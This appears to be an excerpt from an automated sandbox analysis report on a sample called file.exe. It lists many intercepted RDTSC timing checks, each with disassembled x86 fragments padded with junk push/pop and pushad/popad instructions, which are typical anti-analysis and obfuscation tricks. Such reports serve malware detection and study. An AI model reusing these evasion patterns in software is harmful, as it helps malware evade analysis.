      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C594 second address: 68C598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D07C second address: 68D089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7C474F636h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D5FB second address: 68D600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D600 second address: 68D606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694757 second address: 69475C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69475C second address: 694771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d jc 00007FC7C474F638h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F72C second address: 69F738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FC7C5219A56h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB50 second address: 69FB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB5B second address: 69FB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7C5219A5Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB77 second address: 69FB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F643h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB8E second address: 69FB9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC7C5219A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE39 second address: 69FE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE3D second address: 69FE54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FC7C5219A5Ch 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE54 second address: 69FE69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC7C474F640h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A02A4 second address: 6A02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A61h 0x00000009 popad 0x0000000a jp 00007FC7C5219A62h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A02D1 second address: 6A02EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F643h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5701 second address: 6A5715 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jp 00007FC7C5219A56h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5715 second address: 6A5719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5719 second address: 6A572C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FC7C5219A56h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A572C second address: 6A5751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A974B second address: 6A9764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnc 00007FC7C5219A56h 0x0000000c jbe 00007FC7C5219A56h 0x00000012 jnl 00007FC7C5219A56h 0x00000018 popad 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB198 second address: 5EB19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5129 second address: 6B513A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B513A second address: 6B515C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7C474F63Ah 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 jnp 00007FC7C474F636h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B515C second address: 6B5160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB0C6 second address: 6BB0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F648h 0x00000009 ja 00007FC7C474F636h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE44A second address: 6BE454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE454 second address: 6BE45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE45A second address: 6BE45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD1E5 second address: 6CD1E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D566B second address: 6D566F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D566F second address: 6D56BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F648h 0x00000007 jmp 00007FC7C474F648h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FC7C474F648h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D56BB second address: 6D56E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC7C5219A5Dh 0x0000000f pushad 0x00000010 ja 00007FC7C5219A56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D56E9 second address: 6D56EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D59BF second address: 6D59CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5B09 second address: 6D5B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5B0D second address: 6D5B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5E21 second address: 6D5E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC7C474F642h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5E3C second address: 6D5E46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5FB3 second address: 6D5FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5FB7 second address: 6D5FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7C5219A5Eh 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E689A second address: 6E68BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F649h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E68BD second address: 6E68C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E68C3 second address: 6E68C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E68C8 second address: 6E68CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E68CE second address: 6E68D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E68D2 second address: 6E68FC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC7C5219A64h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3CE0 second address: 6F3D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F649h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3D00 second address: 6F3D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC7C5219A56h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F7831 second address: 6F7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F73F8 second address: 6F73FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F73FE second address: 6F741F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC7C474F636h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7C474F643h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F757D second address: 6F7591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8F0 second address: 6FD8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD8F6 second address: 6FD914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FC7C5219A65h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD914 second address: 6FD91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDA69 second address: 6FDA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDBDE second address: 6FDBF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C474F63Ch 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDFD2 second address: 6FDFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC7C5219A5Ch 0x0000000b jmp 00007FC7C5219A5Ch 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDFF4 second address: 6FDFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDFFA second address: 6FE005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE005 second address: 6FE025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FC7C474F647h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE294 second address: 6FE29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE529 second address: 6FE52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE52D second address: 6FE531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7017DA second address: 7017E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007FC7C474F63Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7017E7 second address: 7017F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FC7C5219A56h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702CB1 second address: 702CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702CB8 second address: 702CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A66h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702CDB second address: 702CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704DF5 second address: 704E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FC7C5219A5Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704E09 second address: 704E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704E0F second address: 704E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7048F8 second address: 7048FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7048FC second address: 704913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C5219A5Fh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704913 second address: 704919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704919 second address: 70491D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70491D second address: 70492D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70492D second address: 704931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704931 second address: 70493D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7C474F636h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01AF8 second address: 4A01AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0947 second address: 49A094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A094D second address: 49A0951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0951 second address: 49A0955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06F4 second address: 49D0711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC7C5219A67h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0711 second address: 49D0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+04h] 0x0000000a jmp 00007FC7C474F645h 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, 400CD37Eh 0x0000001a mov dx, A98Ah 0x0000001e popad 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01808 second address: 4A01860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FC7C5219A5Ch 0x00000010 call 00007FC7C5219A62h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 mov ecx, 542EDE97h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f mov edx, 1805B0EEh 0x00000024 mov bx, EDFAh 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01860 second address: 4A01864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01864 second address: 4A0186A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0186A second address: 49A0947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC7C474F63Ch 0x00000012 sbb eax, 4A168B98h 0x00000018 jmp 00007FC7C474F63Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f mov si, bx 0x00000022 pop edi 0x00000023 popad 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push edi 0x00000027 mov ax, 0E55h 0x0000002b pop eax 0x0000002c popad 0x0000002d jmp dword ptr [74E5155Ch] 0x00000033 mov edi, edi 0x00000035 push ebp 0x00000036 mov ebp, esp 0x00000038 mov ecx, dword ptr fs:[00000018h] 0x0000003f mov eax, dword ptr [ebp+08h] 0x00000042 mov dword ptr [ecx+34h], 00000000h 0x00000049 cmp eax, 40h 0x0000004c jnc 00007FC7C474F63Dh 0x0000004e mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000055 pop ebp 0x00000056 retn 0004h 0x00000059 test eax, eax 0x0000005b je 00007FC7C474F653h 0x0000005d mov eax, dword ptr [00459710h] 0x00000062 cmp eax, FFFFFFFFh 0x00000065 je 00007FC7C474F649h 0x00000067 mov esi, 00401BB4h 0x0000006c push esi 0x0000006d call 00007FC7C8CE6DD7h 0x00000072 mov edi, edi 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FC7C474F641h 0x0000007b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499061C second address: 4990620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990620 second address: 4990634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990634 second address: 4990646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A5Eh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990646 second address: 4990694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC7C474F63Ah 0x00000010 or ax, E298h 0x00000015 jmp 00007FC7C474F63Bh 0x0000001a popfd 0x0000001b mov ah, 40h 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 mov esi, edx 0x00000024 jmp 00007FC7C474F63Dh 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FC7C474F63Dh 0x00000033 rdtsc
